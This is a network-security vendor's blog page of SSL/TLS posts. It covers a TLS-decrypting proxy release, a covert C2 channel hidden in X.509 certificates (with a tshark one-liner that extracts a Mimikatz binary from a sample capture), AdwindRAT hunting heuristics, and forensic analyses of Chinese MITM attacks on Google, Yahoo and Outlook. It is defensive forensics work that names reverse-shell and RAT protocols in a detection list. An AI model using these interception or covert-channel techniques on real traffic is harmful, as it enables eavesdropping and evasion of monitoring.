NETRESEC Network Security Blog - Tag : SSL


PolarProxy Released

I’m very proud to announce the release of PolarProxy today! PolarProxy is a transparent TLS proxy that decrypts and re-encrypts TLS traffic while also generating a PCAP file containing the decrypted traffic.

PolarProxy flow chart

PolarProxy enables you to do lots of things that have previously been impossible, or at least very complex, such as:

  • Analyzing HTTP/2 traffic without an SSLKEYLOGFILE
  • Viewing decrypted HTTPS traffic in real-time using Wireshark
    PolarProxy -p 10443,80,443 -w - | wireshark -i - -k
  • Replaying decrypted traffic to an internal or external interface using tcpreplay
    PolarProxy -p 10443,80,443 -w - | tcpreplay -i eth1 -
  • Forwarding of decrypted traffic to a NIDS (see tcpreplay command above)
  • Extracting DNS queries and replies from DNS-over-TLS (DoT) or DNS-over-HTTPS (DoH) traffic
    PolarProxy -p 853,53 -p 443,80
  • Extracting email traffic from SMTPS, POP3S or IMAPS
    PolarProxy -p 465,25 -p 995,110 -p 993,143

Here is an example PCAP file generated by PolarProxy:
https://www.netresec.com/files/polarproxy-demo.pcap

This capture files contains HTTP, WebSocket and HTTP/2 packets to Mozilla, Google and Twitter that would otherwise have been encrypted with TLS.

 HTTP/2 traffic from PolarProxy opened in Wireshark
Image: HTTP/2 traffic from PolarProxy opened in Wireshark

Now, head over to our PolarProxy page and try it for yourself (it’s free)!

Posted by Erik Hjelmvik on Friday, 21 June 2019 06:00:00 (UTC/GMT)

Tags: #PCAP #IDS #Wireshark #IMAPS #TLS #SSL

More... Share  |  Facebook   Twitter   Reddit   Hacker News Short URL: https://netresec.com/?b=196571B


Examining an x509 Covert Channel

Jason Reaves gave a talk titled “Malware C2 over x509 certificate exchange” at BSides Springfield 2017, where he demonstrated that the SSL handshake can be abused by malware as a covert command-and-control (C2) channel.

Jason Reaves presenting at BSides Springfield 2017

He got the idea while analyzing the Vawtrak malware after discovering that it read multiple fields in the X.509 certificate provided by the server before proceeding. Jason initially thought these fields were used as a C2 channel, but then realized that Vawtrak performed a variant of certificate pinning in order to discover SSL man-in-the-middle attempts.

Nevertheless, Jason decided to actually implement a proof-of-concept (PoC) that uses the X.509 certificate as a C2 channel. Jason’s code is now available on GitHub along with a PCAP file demonstrating this covert C2 channel. Of course I couldn’t resist having a little look at this PCAP file in NetworkMiner.

The first thing I noticed was that the proof-of-concept PCAP ran the SSL session on TCP 4433, which prevented NetworkMiner from parsing the traffic as SSL. However, I was able to parse the SSL traffic with NetworkMiner Professional just fine thanks to the port-independent-protocol-identification feature (a.k.a Dynamic Port Detection), which made the Pro-version parse TCP 4433 as SSL/TLS.

X.509 certificates extracted from PCAP with NetworkMiner
Image: X.509 certificates extracted from PCAP with NetworkMiner

A “normal” x509 certificate size is usually around 1kB, so certificates that are 11kB should be considered as anomalies. Also, opening one of these .cer files reveals an extremely large value in the Subject Key Identifier field.

X.509 certificate with MZ header in the Subject Key Identifier field

Not only is this field very large, it also starts with the familiar “4D 5A” MZ header sequence.

NetworkMiner additionally parses details from the certificates that it extracts from PCAP files, so the Subject Key Identifier field is actually accessible from within NetworkMiner, as shown in the screenshot below.

Parameters tab in NetworkMiner showing X.509 certificate details

You can also see that NetworkMiner validates the certificate using the local trusted root certificates. Not surprisingly, this certificates is not trusted (certificate valid = FALSE). It would be most unlikely that anyone would manage to include arbitrary data like this in a signed certificate.


Extracting the MZ Binary from the Covert X.509 Channel

Even though NetworkMiner excels at pulling out files from PCAPs, this is definitively an occasion where manual handling is required. Jason’s PoC implementation actually uses a whopping 79 individual certificates in order to transfer this Mimikatz binary, which is 785 kB.

Here’s a tshark oneliner you can use to extract the Mimikatz binary from Jason's example PCAP file.

tshark -r mimikatz_sent.pcap -Y 'ssl.handshake.certificate_length gt 2000' -T fields -e x509ce.SubjectKeyIdentifier -d tcp.port==4433,ssl | tr -d ':\n' | xxd -r -p > mimikatz.exe

Detecting x509 Anomalies

Even though covert channels using x509 certificates isn’t a “thing” (yet?) it’s still a good idea to think about how this type of covert signaling can be detected. Just looking for large Subject Key Identifier fields is probably too specific, since there are other fields and extensions in X.509 that could also be used to transmit data. A better approach would be to alert on certificates larger than, let’s say, 3kB. Multiple certificates can also be chained together in a single TLS handshake certificate record, so it would also make sense to look for handshake records larger than 8kB (rough estimate).

Bro IDS logo

This type of anomaly-centric intrusion detection is typically best done using the Bro IDS, which provides easy programmatic access to the X.509 certificate and SSL handshake.

There will be false positives when alerting on large certificates in this manner, which is why I recommend to also check if the certificates have been signed by a trusted root or not. A certificate that is signed by a trusted root is very unlikely to contain malicious data.

Posted by Erik Hjelmvik on Tuesday, 06 February 2018 12:13:00 (UTC/GMT)

Tags: #malware #C2 #SSL #TLS #certificate #NetworkMiner #PCAP #X.509 #PIPI #IDS #tshark

More... Share  |  Facebook   Twitter   Reddit   Hacker News Short URL: https://netresec.com/?b=182E662


Hunting AdwindRAT with SSL Heuristics

An increasing number of malware families employ SSL/TLS encryption in order to evade detection by Network Intrusion Detection Systems (NIDS). In this blog post I’m gonna have a look at Adwind, which is a cross-platform Remote Access Trojan (RAT) that has been using SSL to conceal it’s traffic for several years. AdwindRAT typically connects SSL sessions to seemingly random TCP ports on the C2 servers. Hence, a heuristic that could potentially be used to hunt for Adwind RAT malware is to look for SSL traffic going to TCP ports that normally don’t use SSL. However, relying on ONLY that heuristic would generate way too many false positives.

Brad Duncan did an interesting writeup about Adwind RAT back in 2015, where he wrote:

I saw the same certificate information used last week, and it continues this week.
  • commonName = assylias
  • organizationName = assylias.Inc
  • countryName = FR
Currently, this may be the best way to identify Adwind-based post-infection traffic. Look for SSL traffic on a non-standard TCP port using that particular certificate.

Unfortunately, Adwind RAT has evolved to use other CN’s in their new certificates, so looking for “assylias.Inc” will not cut it anymore. However, looking for SSL traffic on non-standard TCP ports still holds on the latest Adwind RAT samples that we’ve analyzed.

The PT Research Attack Detection Team (ADT) sent an email with IDS signatures for detecting AdwindRAT to the Emerging-Sigs mailing list a few days ago, where they wrote:

“We offer one of the ways to detect malicious AdwindRAT software inside the encrypted traffic. Recently, the detection of this malicious program in network traffic is significantly reduced due to encryption. As a result of the research, a stable structure of data fragments was created.”

Not only is it awesome that they were able to detect static patterns in the encrypted data, they also provided 25 PCAP files containing AdwindRAT traffic. I loaded these PCAP files into NetworkMiner Professional in order to have a look at the X.509 certificates. NetworkMiner Professional supports Port-Independent Protocol Identification (PIPI), which means that it will automatically identify the C2 sessions as SSL, regardless of which port that is used. It will also automatically extract the X.509 certificates along with any other parameters that can be extracted from the SSL handshake before the session goes encrypted.

X.509 certificates extracted from AdwindRAT PCAP by NetworkMiner Image: Files extracted from ADT’s PCAP files that mach “Oracle” and “cer”.

In this recent campaign the attackers used X.509 certificates claiming to be from Oracle. The majory of the extracted certificates were exactly 1237 bytes long, so maybe they’re all identical? This is what the first extracted X.509 certificate looks like:

Self-signed Oracle America, Inc. X.509 certificate

The cert claims to be valid for a whopping 100 years!

Self-signed Oracle America, Inc. X.509 certificate

Self-signed, not trusted.

However, after opening a few of the other certificates it's clear that each C2 server is using a unique X.509 certificate. This can be quickly confirmed by opening the parameters tab in NetworkMiner Pro and showing only the Certificate Hash or Subject Key Identifier values.

NetworkMiner Parameters tab showing Certificate Hash values Image: Certificate Hash values found in Adwind RAT’s SSL traffic

I also noted that the CN of the certificates isn’t constant either; these samples use CN’s such as “Oracle America”, “Oracle Tanzania”, “Oracle Arusha Inc.”, “Oracle Leonardo” and “Oracle Heaven”.

The CN field is normally used to specify which domain(s) the certificate is valid for, together with any additinoal Subject Alternative Name field. However, Adwind RAT’s certificates don’t contain any domain name in the CN field and they don’t have an Alternative Name record. This might very well change in future versions of this piece of malware though, but I don’t expect the malware authors to generate a certificate with a CN matching the domain name used by each C2 server. I can therefore use this assumption in order to better hunt for Adwind RAT traffic.

But how do I know what public domain name the C2 server has? One solution is to use passive DNS, i.e. to capture all DNS traffic in order to do passive lookups locally. Another solution is to leverage the fact that the Adwind RAT clients use the Server Name Indication (SNI) when connecting to the C2 servers.

TLS Server Name (aka SNI) and Subject CN values don’t match for AdwindRAT Image: TLS Server Name (aka SNI) and Subject CN values don’t match for AdwindRAT

TLS Server Name (SNI) with matching Subject CN from Google Image: TLS Server Name (SNI) with matching Subject CN from Google.

My conclusion is therefore that Brad’s recommendations from 2015 are still pretty okay, even for the latest wave of Adwind RAT traffic. However, instead of looking for a fix CN string I’d prefer to use the following heuristics to hunt for this type of C2 traffic:

  • SSL traffic to non-standard SSL port
  • Self signed X.509 certificate
  • The SNI domain name in the Client Hello message does not match the CN or Subject Alternative Name of the certificate.

These heuristics will match more than just Adwind RAT traffic though. You’ll find that the exact same heuristics will also help identify other pieces of SSL-enabled malware as well as Tor traffic.

Posted by Erik Hjelmvik on Monday, 04 September 2017 19:01:00 (UTC/GMT)

Tags: #NetworkMiner #SSL #TLS #port #PCAP #PIPI #X.509 #certificate #extract

More... Share  |  Facebook   Twitter   Reddit   Hacker News Short URL: https://netresec.com/?b=1798DC3


NetworkMiner 2.2 Released

NetworkMiner 2.2 = Harder Better Faster Stronger

NetworkMiner 2.2 is faster, better and stronger than ever before! The PCAP parsing speed has more than doubled and even more details are now extracted from analyzed packet capture files.

The improved parsing speed of NetworkMiner 2.2 can be enjoyed regardless if NetworkMiner is run in Windows or Linux, additionally the user interface is more responsive and flickers way less when capture files are being loaded.

User Interface Improvements

The keyword filter available in the Files, Messages, Sessions, DNS and Parameters tabs has been improved so that the rows now can be filtered on a single column of choice by selecting the desired column in a drop-down list. There is also an “Any column” option, which can be used to search for the keyword in all columns.

Keyword drop-down in NetworkMiner's Parameters tab

The Messages tab has also received an additional feature, which allows the filter keyword to be matched against the text in the message body as well as email headers when the “Any column” option is selected. This allows for an efficient analysis of messages (such as emails sent/received through SMTP, POP3 and IMAP as well as IRC messages and some HTTP based messaging platforms), since the messages can be filtered just like in a normal e-mail client.

We have also given up on using local timestamp formats; timestamps are now instead shown using the yyyy-MM-dd HH:mm:ss format with time zone explicitly stated.

Protocol Parsers

NetworkMiner 2.2 comes with a parser for the Remote Desktop Protocol (RDP), which rides on top of COTP and TPKT. The RDP parser is primarily used in order to extract usernames from RDP cookies and show them on the Credentials tab. This new version also comes with better extraction of SMB1 and SMB2 details, such as NTLM SSP usernames.

RDP Cookies extracted with NetworkMiner 2.2

One big change that has been made behind the scenes of NetworkMiner is the move from .NET Framework 2.0 to version 4.0. This move doesn’t require any special measures to be taken for most Microsoft Windows users since the 4.0 Framework is typically already installed on these machines. If you’re running NetworkMiner in Linux, however, you might wanna check out our updated blog post on how to install NetworkMiner in Linux.

We have also added an automatic check for new versions of NetworkMiner, which runs every time the tool is started. This update check can be disabled by adding a --noupdatecheck switch to the command line when starting NetworkMiner.

NetworkMiner.exe --noupdatecheck capturefile.pcap

NetworkMiner Professional

Even though NetworkMiner 2.2 now uses ISO-like time representations NetworkMiner still has to decide which time zone to use for the timestamps. The default decision has always been to use the same time zone as the local machine, but NetworkMiner Professional now additionally comes with an option that allows the user to select whether to use UTC (as nature intended), the local time zone or some other custom time zone for displaying timestamps. The time zone setting can be found in the “Tools > Settings” menu.

UPDATE: With the release of NetworkMiner 2.3 the default time zone is now UTC unless the user has specifically selected a different time zone.

The Port-Independent-Protocol-Detection (PIPI) feature in NetworkMiner Pro has been improved for more reliable identification of HTTP, SSH, SOCKS, FTP and SSL sessions running on non-standard port numbers.

CASE / JSON-LD Export

We are happy to announce that the professional edition of NetworkMiner 2.2 now has support for exporting extracted details using the Cyber-investigation Analysis Standard Expression (CASE) format, which is a JSON-LD format for digital forensics data. The CASE export is also available in the command line tool NetworkMinerCLI.

We would like to thank Europol for recommending us to implement the CASE export format in their effort to adopt CASE as a standard digital forensic format. Several other companies in the digital forensics field are currently looking into implementing CASE in their tools, including AccessData, Cellebrite, Guidance, Volatility and XRY. We believe the CASE format will become a popular format for exchanging digital forensic data between tools for digital forensics, log correlation and SIEM solutions.

We will, however, still continue supporting and maintaining the CSV and XML export formats in NetworkMiner Professional and NetworkMinerCLI alongside the new CASE format.

Credits

I would like to thank Sebastian Gebhard and Clinton Page for reporting bugs in the Credentials tab and TFTP parsing code that now have been fixed. I would also like to thank Jeff Carrell for providing a capture file that has been used to debug an issue in NetworkMiner’s OpenFlow parser. There are also a couple of users who have suggested new features that have made it into this release of NetworkMiner. Marc Lindike suggested the powerful deep search of extracted messages and Niclas Hirschfeld proposed a new option in the PCAP-over-IP functionality that allows NetworkMiner to receive PCAP data via a remote netcat listener.

Upgrading to Version 2.2

Users who have purchased a license for NetworkMiner Professional 2.x can download a free update to version 2.2 from our customer portal.

Those who instead prefer to use the free and open source version can grab the latest version of NetworkMiner from the official NetworkMiner page.

Posted by Erik Hjelmvik on Tuesday, 22 August 2017 11:37:00 (UTC/GMT)

Tags: #pcap #CASE #PIPI #HTTP #SOCKS #SSL #port #forensics

More... Share  |  Facebook   Twitter   Reddit   Hacker News Short URL: https://netresec.com/?b=17888CB


Port Independent Protocol Detection

Protocol Alphabet Soup by ThousandEyes

Our heavy-duty PCAP analyzer CapLoader comes with a feature called ”Port Independent Protocol Identification”, a.k.a. PIPI (see Richard Bejtlich's PIPI blog post from 2006). Academic research in the Traffic Measurement field often use the term ”Traffic Classification”, which is similar but not the same thing. Traffic Classification normally group network traffic in broad classes, such as Email, Web, Chat or VoIP. CapLoader, on the other hand, identifies the actual application layer protocol used in each flow. So instead of classifying a flow as ”VoIP” CapLoader will tell you if the flow carries SIP, Skype, RTP or MGCP traffic. This approach is also known as “Dynamic Protocol Detection”.

Being able to identify application layer protocols without relying on the TCP or UDP port number is crucial when analyzing malicious traffic, such as malware Command-and-Control (C2) communication, covert backdoors and rouge servers, since such communication often use services on non-standard ports. Some common examples are:

  • Many botnet C2 protocols communicate over port TCP 443, but using a proprietary protocol rather than HTTP over SSL.
  • Backdoors on hacked computers and network devices typically wither run a standard service like SSH on a port other than 22 in order to hide.
  • More advanced backdoors use port knocking to run a proprietary C2 protocol on a standard port (SYNful knock runs on TCP 80).

This means that by analyzing network traffic for port-protocol anomalies, like an outgoing TCP connection to TCP 443 that isn't SSL, you can effectively detect intrusions without having IDS signatures for all C2 protocols. This analysis technique is often used when performing Rinse-Repeat Intrusion Detection, which is a blacklist-free approach for identifying intrusions and other form of malicious network traffic. With CapLoader one can simply apply a BPF filter like “port 443” and scroll through the displayed flows to make sure they are all say “SSL” in the Protocol column.

CapLoader detects non-SSL traffic to 1.web-counter.info Image: Miuref/Boaxxe Trojan C2 traffic to "1.web-counter[.]info" on TCP 443 doesn't use SSL (or HTTPS)

Statistical Analysis

CapLoader relies on statistical analysis of each TCP, UDP and SCTP session's behavior in order to compare it to previously computed statistical models for known protocols. These statistical models are generated using a multitude of metrics, such as inter-packet delays, packet sizes and payload data. The port number is, on the other hand, a parameter that is intentionally not used by CapLoader to determine the application layer protocol.

The PIPI/Dynamic Protocol Detection feature in CapLoader has been designed to detect even encrypted and obfuscated binary protocols, such as Tor and Encrypted BitTorrent (MSE). These protocols are designed in order to deceive protocol detection mechanisms, and traditional signature based protocol detection algorithms can't reliably detect them. The statistical approach employed by CapLoader can, on the other hand, actually detect even these highly obfuscated protocols. It is, however, important to note that being a statistical method it will never be 100% accurate. Analysts should therefore not take for granted that a flow is using the protocol stated by CapLoader. There are some situations when it is very difficult to accurately classify an encrypted protocol, such as when the first part of a TCP session is missing in the analyzed data. This can occur when there is an ongoing session that was established before the packet capture was started.


Identified Protocols

The following protocols are currently available for detection in CapLoader's protocol database:

AOL Instant Messenger
BACnet
BitTorrent
BitTorrent Encrypted - MSE
CCCam
CUPS
DAYTIME
DHCP
DHCPv6
Diameter
DirectConnect
DNS
Dockster
DropBox LSP
eDonkey
eDonkey Obfuscated
EtherNet-IP
FTP
Gh0st RAT
Gnutella
Groove LAN DPP
HSRP
HTTP
IMAP
IRC
ISAKMP
iSCSI
JavaRMI
Kelihos
Kerberos
L2TP
LDAP
LLC
Meterpreter
MgCam
MGCP
MikroTik NDP
Modbus TCP
MSN Messenger
MS RPC
MS-SQL
MySQL
NAT-PMP
NetBIOS Datagram Service
NetBIOS Name Service
NetBIOS Session Service
NetFlow
NTP
OsCam
Pcap-over-IP
Poison Ivy RAT
POP3
QUIC
Ramnit
Reverse Shell
RTCP
RTP
RTSP
Shell
SIP
Skype
SLP
SMTP
SNMP
Socks
SopCast P2P
Spotify P2P
Spotify Server
SSH
SSL
Syslog
TeamViewer
TeamViewer UDP
Telnet
Teredo
TFTP
TFTP Data
TPKT
VNC
WS-Discovery
XMPP Jabber
ZeroAccess
Zeus TCP
Zeus UDP

The list of implemented protocols is constantly being increased with new protocols.


PIPI in NetworkMiner

NetworkMiner Logo

NetworkMiner Professional, which is the commercial version of NetworkMiner, also comes with an implementation of our protocol detection mechanism. Even though NetworkMiner Professional doesn't detect as many protocols as CapLoader, the PIPI feature built into NetworkMiner Pro still helps a lot when analyzing HTTP traffic on ports other that 80 or 8080 as well as in order to reassemble files downloaded from FTP or TFTP servers running on non-standard ports.

 

Posted by Erik Hjelmvik on Tuesday, 06 October 2015 09:05:00 (UTC/GMT)

Tags: #Protocol Identification #CapLoader #VoIP #SIP #RTP #TOR #SSL #PIPI #PCAP #NetworkMiner

More... Share  |  Facebook   Twitter   Reddit   Hacker News Short URL: https://netresec.com/?b=15A1776


Chinese MITM attack on outlook.com

An illustration from supplement to 'Le Petit Journal', 16th January 1898.

We were contacted by GreatFire.org earlier today regarding a new Chinese man-in-the-middle (MITM) attack. This time the perpetrators decrypted traffic between Chinese users and Microsoft's IMAP mail server for outlook.com. As evidence GreatFire.org provided us with a packet capture file, which we have analyzed.

Our conclusion is that this was a real attack on Microsoft's email service. Additionally, the attack is very similar to previous nationwide Chinese attacks on SSL encrypted traffic, such as the attack on Google a few months ago. Details such as email address, email password, email contents, email attachments and contacts may have been compromised in this attack. We do not know the scale of the attack, it could be anything from a fairly targeted attack to a nation wide attack in China. What we do know is that there are several users who have been subjected to the MITM attack and posted screenshots online.

Technical Analysis

Attacked IP Address: 157.56.195.250 (imap-mail.outlook.com)
Attacked Protocol: SSL encryption of IMAPS (TCP 993)
Date of Attack: 2015-01-18
PCAP File: https://www.cloudshark.org/captures/8bf76336e67d

In our technical analysis we first extracted the x509 certificates from the SSL traffic by loading the capture file into NetworkMinerCLI. We then parsed the extracted certificates with OpenSSL.

$ mono /opt/NetworkMinerProfessional_1-6-1/NetworkMinerCLI.exe -r Outlook_MITM_2015-01-18.pcapng
Closing file handles...
84 frames parsed in 0.888754 seconds.
$ ls AssembledFiles/157.56.195.250/TLS_Cert\ -\ TCP\ 993/*.cer
AssembledFiles/157.56.195.250/TLS_Cert - TCP 993/hotmail.com[1].cer
AssembledFiles/157.56.195.250/TLS_Cert - TCP 993/hotmail.com[2].cer
AssembledFiles/157.56.195.250/TLS_Cert - TCP 993/hotmail.com.cer
$ openssl x509 -inform DER -in AssembledFiles/157.56.195.250/TLS_Cert\ -\ TCP\ 993/hotmail.com.cer -noout -issuer -subject -startdate -fingerprint
issuer= /CN=*.hotmail.com
subject= /CN=*.hotmail.com
notBefore=Jan 15 16:00:00 2015 GMT
SHA1 Fingerprint=75:F4:11:59:5F:E9:A2:1A:17:A4:96:7C:7B:66:6E:51:52:79:1A:32

When looking at the timestamps in the capture file we noticed that the SSL server's reply to the 'Client Hello' was very slow; response times varied between 14 and 20 seconds. Under normal circumstances the 'Server Hello' arrives within 0.3 seconds after the 'Client Hello' has been sent.

$ tshark -nr ./Outlook_MITM_2015-01-18.pcapng -Y 'ssl.handshake.type lt 3'
8 9.023876000 10.0.2.15 -> 157.56.195.250 SSL 265 Client Hello
17 26.885504000 157.56.195.250 -> 10.0.2.15 TLSv1 576 Server Hello, Certificate, Server Hello Done
45 101.747755000 10.0.2.15 -> 157.56.195.250 SSL 265 Client Hello
49 116.258483000 157.56.195.250 -> 10.0.2.15 TLSv1 576 Server Hello, Certificate, Server Hello Done
63 116.338420000 10.0.2.15 -> 157.56.195.250 SSL 265 Client Hello
65 136.119127000 157.56.195.250 -> 10.0.2.15 TLSv1 576 Server Hello, Certificate, Server Hello Done
[...]

This is slow SSL response is consistent with previous SSL MITM attacks conducted with support of the Great Firewall of China (GFW).

For more details on this attack, please see the Reuters story "After Gmail blocked in China, Microsoft's Outlook hacked" and GreatFire's own blog post "Outlook grim - Chinese authorities attack Microsoft".

Posted by Erik Hjelmvik on Monday, 19 January 2015 22:55:00 (UTC/GMT)

Tags: #Netresec #PCAP #PCAPNG #GFW #MITM #China #Hotmail #IMAP #IMAPS #SSL

More... Share  |  Facebook   Twitter   Reddit   Hacker News Short URL: https://netresec.com/?b=151ACA1


Verifying Chinese MITM of Yahoo

Yahoo Umbrella GreatFire.org sent out a tweet yesterday saying that “Yahoo appears to under Man-in-the-middle attack in China. 3rd case of country-wide MITM, after Google, Github”.

Mashable later ran a story called “China Appears to Attack Yahoo in Latest Censorship of Hong Kong Protests”, where Lorenzo Franceschi-Bicchierai write:

In what's almost unprecedented, China appears to be targeting Yahoo with what's called a "man-in-the-middle attack." With such an attack, connections to Yahoo.com, which are normally encrypted, would be vulnerable to snooping, and Chinese censors could also block search terms or specific Yahoo links with the goal of preventing Chinese netizens from accessing information about the protests in Hong Kong.

In this blog post we verify that there is an ongoing Man-in-the-Middle (MITM) attack by analyzing two different packet capture files.

Capture LocationCapture DateFilenameMD5
Wuxi, China 2014-09-30
10:15 (UTC)
Yahoo.pcapng5633a0cce5955b44 18189fe3fd27847d
Zhengzhou, China2014-09-30
11:35 (UTC)
YahooMITM.pcapng722ca9b7837416ef 2391b48edd20d24e

Both PCAP files were created with Wireshark/dumpcap using a capture filter of “host 202.43.192.109”, which is the IP address that was reported to be MITM'ed by the Great Firewall of China (GFW). This IP address is located in Hong Kong and is used by Yahoo to host www.yahoo.com, hk.yahoo.com etc. for users in this part of Asia.


Time-To-Live (TTL) Analysis

We estimate the distance between the end users and the Yahoo server in Hong Kong to be at least 10 router hops. However, the IP packets coming back to the users have IP TTL values of 58 (Wuxi) and 57 (Zhengzhou). This implies that the MITM is performed somewhere in China, just 6 or 7 router hops away from the users. This is consistent with what we've observed in previous MITM attacks performed by China against GitHub and Google.

CapLoader 1.2 Hosts tab with hk.yahoo.com
IMAGE: Hosts tab in CapLoader showing TTL 57 for hk.yahoo.com:443


X.509 Certificate Analysis

We have extracted a X.509 certificate from one of the PcapNG files to a .cer file using NetworkMiner. This SSL certificate is available for download here.

$ openssl x509 -inform DER -in yahoo.com.cer -noout -issuer -subject -startdate -enddate -fingerprint
issuer= /C=cn/O=yahoo.com/CN=yahoo.com
subject= /C=cn/O=yahoo.com/CN=yahoo.com
notBefore=Sep 23 11:30:17 2014 GMT
notAfter=Sep 23 11:30:17 2015 GMT
SHA1 Fingerprint=22:90:C3:11:EA:0F:3F:57:E0:6D:F4:5B:69:8E:18:E8:28:E5:9B:C3

The certificate is a self signed certificate for “yahoo.com”. The fact that the MITM uses a self signed certificate makes the attack easily detectable even for the non-technical user, since the web browser will typically display a warning about the site not being trusted.

Some may think it's odd that China can't forge a properly signed certificate for their SSL MITM attack. However, they've used very similar self signed certificates also in their previous MITM attacks against GitHub and Google. The purpose of GFW (a.k.a. “Golden Shield”) is to censor the Internet, so the primary goal with this MITM attack isn't to covertly spy on Chinese Yahoo searches. Regardless if the end users notice the MITM or not, a self signed X.509 cert is enough in order to see what they are searching for and “kill” their connection to Yahoo when queries like “Umbrella Revolution” and “Tiananmen Square Protests” are observed.

Posted by Erik Hjelmvik on Wednesday, 01 October 2014 21:55:00 (UTC/GMT)

Tags: #MITM #GFW #PCAP #PCAPNG #SSL #TLS #China

More... Share  |  Facebook   Twitter   Reddit   Hacker News Short URL: https://netresec.com/?b=14AC5EE


Analysis of Chinese MITM on Google

The Chinese are running a MITM attack on SSL encrypted traffic between Chinese universities and Google. We've performed technical analysis of the attack, on request from GreatFire.org, and can confirm that it is a real SSL MITM against www.google.com and that it is being performed from within China.

We were contacted by GreatFire.org yesterday (September 3) with a request to analyze two packet captures from suspected MITM-attacks before they finalized their blog post. The conclusions from our analysis is now published as part of GreatFire.org's great blog post titled “Authorities launch man-in-the-middle attack on Google”.

In their blog post GreatFire.org write:

From August 28, 2014 reports appeared on Weibo and Google Plus that users in China trying to access google.com and google.com.hk via CERNET, the country’s education network, were receiving warning messages about invalid SSL certificates. The evidence, which we include later in this post, indicates that this was caused by a man-in-the-middle attack.

While the authorities have been blocking access to most things Google since June 4th, they have kept their hands off of CERNET, China’s nationwide education and research network. However, in the lead up to the new school year, the Chinese authorities launched a man-in-the-middle (MITM) attack against Google.

Our network forensic analysis was performed by investigating the following to packet capture files:

Capture LocationClient NetnameCapture DateFilenameMD5
Peking UniversityPKU6-CERNET2Aug 30, 2014google.com.pcapaba4b35cb85ed218 7a8a7656cd670a93
Chongqing UniversityCQU6-CERNET2Sep 1, 2014google_fake.pcapng3bf943ea453f9afa 5c06b9c126d79557


Client and Server IP adresses

The analyzed capture files contain pure IPv6 traffic (CERNET is a IPv6 network) which made the analysis a bit different then usual. We do not disclose the client IP addresses for privacy reasons, but they both seem legit; one from Peking University (netname PKU6-CERNET2) and the other from Chongqing University (CQU6-CERNET2). Both IP addresses belong to AS23910, named "China Next Generation Internet CERNET2".

PekingUniversityPic6 by galaygobi
Peking University entrance, by galaygobi (Creative Commons Attribution 2.0)

CQUAQUGATE3 by Brooktse
Chongqing University gate, by Brooktse (Creative Commons Attribution-Share Alike 3.0)

The IP addresses received for www.google.com were in both cases also legit, so the MITM wasn't carried out through DNS spoofing. The Peking University client connected to 2607:f8b0:4007:804::1013 (GOOGLE-IPV6 in United States) and the connection from Chongqing University went to 2404:6800:4005:805::1010 (GOOGLE_IPV6_AP-20080930 in Australia).


Time-To-Live (TTL) Analysis

The Time-To-Live (TTL) values received in the IP packets from www.google.com were in both cases 248 or 249 (note: TTL is actually called ”Hop Limit” in IPv6 nomenclature, but we prefer to use the well established term ”TTL” anyway). The highest possible TTL value is 255, this means that the received packets haven't made more than 6 or 7 router hops before ending up at the client. However, the expected number of router hops between a server on GOOGLE-IPV6 and the client at Peking University is around 14. The low number of router hops is is a clear indication of an IP MITM taking place.

CapLoader 1.2, Hosts tab
Image: CapLoader with both capture files loaded, showing TTL values

Here is an IPv6 traceroute from AS25795 in Los Angeles towards the IP address at Peking University (generated with ARP Networks' 4or6.com tool):

#traceroute -6 2001:da8:201:[REDACTED]
 1  2607:f2f8:1600::1 (2607:f2f8:1600::1) 1.636 ms 1.573 ms 1.557 ms
 2  2001:504:13::1a (2001:504:13::1a) 40.381 ms 40.481 ms 40.565 ms
 3  * * *
 4  2001:252:0:302::1 (2001:252:0:302::1) 148.409 ms 148.501 ms 148.595 ms
 5  * * *
 6  2001:252:0:1::1 (2001:252:0:1::1) 148.273 ms 147.620 ms 147.596 ms
 7  pku-bj-v6.cernet2.net (2001:da8:1:1b::2) 147.574 ms 147.619 ms 147.420 ms
 8  2001:da8:1:50d::2 (2001:da8:1:50d::2) 148.582 ms 148.670 ms 148.979 ms
 9  cernet2.net (2001:da8:ac:ffff::2) 147.963 ms 147.956 ms 147.988 ms
10  2001:da8:201:[REDACTED] 147.964 ms 148.035 ms 147.895 ms
11  2001:da8:201:[REDACTED] 147.832 ms 147.881 ms 147.836 ms
12  2001:da8:201:[REDACTED] 147.809 ms 147.707 ms 147.899 ms

As can be seen in the traceroute above, seven hops before the client we find the 2001:252::/32 network, which is called “CNGI International Gateway Network (CNGIIGN)”. This network is actually part of CERNET, but on AS23911, which is the network that connects CERNET with its external peers. A reasonable assumption is therefore that the MITM is carried out on the 2001:252::/32 network, or where AS23910 (2001:da8:1::2) connects to AS23911 (2001:252:0:1::1). This means that the MITM attack is being conducted from within China.


Response Time Analysis

The round-trip time between the client and server can be estimated by measuring the time from when the client sends it initial TCP SYN packet to when it receives a TCP SYN+ACK from the server. The expected round-trip time for connecting from CERNET to a Google server overseas would be around 150ms or more. However, in the captures we've analyzed the TCP SYN+ACK package was received in just 8ms (Peking) and 52ms (Chongqing) respectively. Again, this is a clear indication of an IP MITM taking place, since Google cannot possibly send a response from the US to CERNET within 8ms regardless of how fast they are. The fast response times also indicate that the machine performing the MITM is located fairly close to the network at Peking University.

Even though the machine performing the MITM was very quick at performing the TCP tree-way handshake we noticed that the application layer communication was terribly slow. The specification for the TLS handshake (RFC 2246) defines that a ClientHello message should be responded to with a ServerHello. Google typically send their ServerHello response almost instantly, i.e. the response is received after one round-trip time (150ms in this case). However, in the analyzed captures we noticed ServerHello response times of around 500ms.


X.509 Certificate Analysis

The X.509 certificates were extracted from the two PCAP files to .cer files using NetworkMiner. We noticed that both users received identical certificates, which were both self signed for “google.com”. The fact that the MITM used a self signed certificate makes the attack easily detectable even for the non-technical user, since the web browser will typically display a warning about the site not being trusted. Additionally the X.509 certificate was created for ”google.com” rather than ”*.google.com”. This is an obvious miss from the MITM'ers side since they were attempting to MITM traffic to ”www.google.com” but not to ”google.com”.

NetworkMiner 1.6.1, Files tab
Image: NetworkMiner showing list of X.509 certificates extracted from the two PCAP files

Certificate SHA1 fingerprint: f6beadb9bc02e0a152d71c318739cdecfc1c085d
Certificate MD5 fingerprint: 66:D5:D5:6A:E9:28:51:7C:03:53:C5:E1:33:14:A8:3B

A copy of the fake certificate is available on Google drive thanks to GreatFire.org.


Conclusions

All evidence indicates that a MITM attack is being conducted against traffic between China’s nationwide education and research network CERNET and www.google.com. It looks as if the MITM is carried out on a network belonging to AS23911, which is the outer part of CERNET that peers with all external networks. This network is located in China, so we can conclude that the MITM was being done within the country.

